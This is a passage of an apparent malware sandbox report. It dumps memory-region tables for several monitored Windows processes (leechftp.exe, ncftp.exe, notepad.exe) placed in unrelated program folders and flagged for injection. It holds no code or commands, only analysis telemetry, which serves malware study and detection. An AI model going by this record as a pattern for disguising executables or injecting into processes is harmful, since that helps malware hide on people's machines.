"c:\\windows\\syswow64\\msctf.dll") Region: id = 3298 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3299 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3300 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3301 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3302 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3303 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 3304 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 3305 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3306 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 3307 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3308 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 3309 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 3310 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 3311 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 3312 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3313 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3314 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3315 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Thread: id = 176 os_tid = 0xc8 Process: id = "24" image_name = "leechftp.exe" filename = "c:\\program files (x86)\\internet explorer\\leechftp.exe" page_root = "0x4c8f6000" os_pid = "0x64" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "8" os_parent_pid = "0x45c" cmd_line = "\"C:\\Program Files (x86)\\Internet Explorer\\leechftp.exe\" " cur_dir = "C:\\Program Files (x86)\\Internet Explorer\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3317 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3318 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3319 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3320 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3321 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3322 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 3323 start_va = 0x80000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 3324 start_va = 0x180000 end_va = 0x1e6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3325 start_va = 0x220000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 3326 start_va = 0x320000 end_va = 0x32ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 3327 start_va = 0x3d0000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 3328 start_va = 0x450000 end_va = 0x52efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 3329 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 3330 start_va = 0x6c0000 end_va = 0x847fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 3331 start_va = 0x850000 end_va = 0x9d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 3332 start_va = 0x9e0000 end_va = 0xb4afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009e0000" filename = "" Region: id = 3333 start_va = 0xb60000 end_va = 0xb9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 3334 start_va = 0x1020000 end_va = 0x1036fff monitored = 0 entry_point = 0x10214a1 region_type = mapped_file name = "leechftp.exe" filename = "\\Program Files (x86)\\Internet Explorer\\leechftp.exe" (normalized: "c:\\program files (x86)\\internet explorer\\leechftp.exe") Region: id = 3335 start_va = 0x1040000 end_va = 0x243ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001040000" filename = "" Region: id = 3336 start_va = 0x2440000 end_va = 0x2e03fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002440000" filename = "" Region: id = 3337 start_va = 0x73430000 end_va = 0x73432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 3338 start_va = 0x742a0000 end_va = 0x742b2fff monitored = 0 entry_point = 0x742a1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3339 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3340 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3341 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3342 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3343 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3344 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3345 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3346 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 3347 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3348 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3349 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3350 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3351 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3352 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3353 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3354 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3355 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3356 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 3357 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 3358 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3359 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 3360 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3361 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 3362 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 3363 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 3364 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 3365 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3366 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3367 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3368 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Thread: id = 178 os_tid = 0x62c Process: id = "25" image_name = "ncftp.exe" filename = "c:\\program files (x86)\\windows sidebar\\ncftp.exe" page_root = "0x4c1fc000" os_pid = "0x728" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "8" os_parent_pid = "0x45c" cmd_line = "\"C:\\Program Files (x86)\\Windows Sidebar\\ncftp.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Sidebar\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3370 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3371 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3372 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3373 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3374 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3375 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 3376 start_va = 0x70000 end_va = 0xd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3377 start_va = 0x120000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 3378 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3379 start_va = 0x260000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 3380 start_va = 0x270000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 3381 start_va = 0x370000 end_va = 0x4f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 3382 start_va = 0x560000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 3383 start_va = 0x5e0000 end_va = 0x760fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 3384 start_va = 0x7d0000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 3385 start_va = 0x8d0000 end_va = 0x9aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 3386 start_va = 0xa10000 end_va = 0xa26fff monitored = 0 entry_point = 0xa114a1 region_type = mapped_file name = "ncftp.exe" filename = "\\Program Files (x86)\\Windows Sidebar\\ncftp.exe" (normalized: "c:\\program files (x86)\\windows sidebar\\ncftp.exe") Region: id = 3387 start_va = 0xa30000 end_va = 0x1e2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 3388 start_va = 0x1e30000 end_va = 0x27f3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 3389 start_va = 0x2800000 end_va = 0x2964fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002800000" filename = "" Region: id = 3390 start_va = 0x73430000 end_va = 0x73432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 3391 start_va = 0x742a0000 end_va = 0x742b2fff monitored = 0 entry_point = 0x742a1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3392 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3393 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3394 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3395 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3396 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3397 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3398 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3399 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 3400 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3401 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3402 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3403 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3404 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3405 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3406 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3407 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3408 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3409 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 3410 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 3411 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3412 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 3413 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3414 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 3415 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 3416 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 3417 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 3418 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3419 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3420 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3421 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Thread: id = 179 os_tid = 0x84c Process: id = "26" image_name = "notepad.exe" filename = "c:\\program files\\windows photo viewer\\notepad.exe" page_root = "0x4ca02000" os_pid = "0x40c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "8" os_parent_pid = "0x45c" cmd_line = "\"C:\\Program Files\\Windows Photo Viewer\\notepad.exe\" " cur_dir = "C:\\Program Files\\Windows Photo Viewer\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3423 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3424 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3425 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3426 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3427 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3428 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 3429 start_va = 0x70000 end_va = 0xeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 3430 start_va = 0xf0000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3431 start_va = 0x1a0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3432 start_va = 0x1e0000 end_va = 0x2dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 3433 start_va = 0x330000 end_va = 0x42ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 3434 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 3435 start_va = 0x4f0000 end_va = 0x677fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed 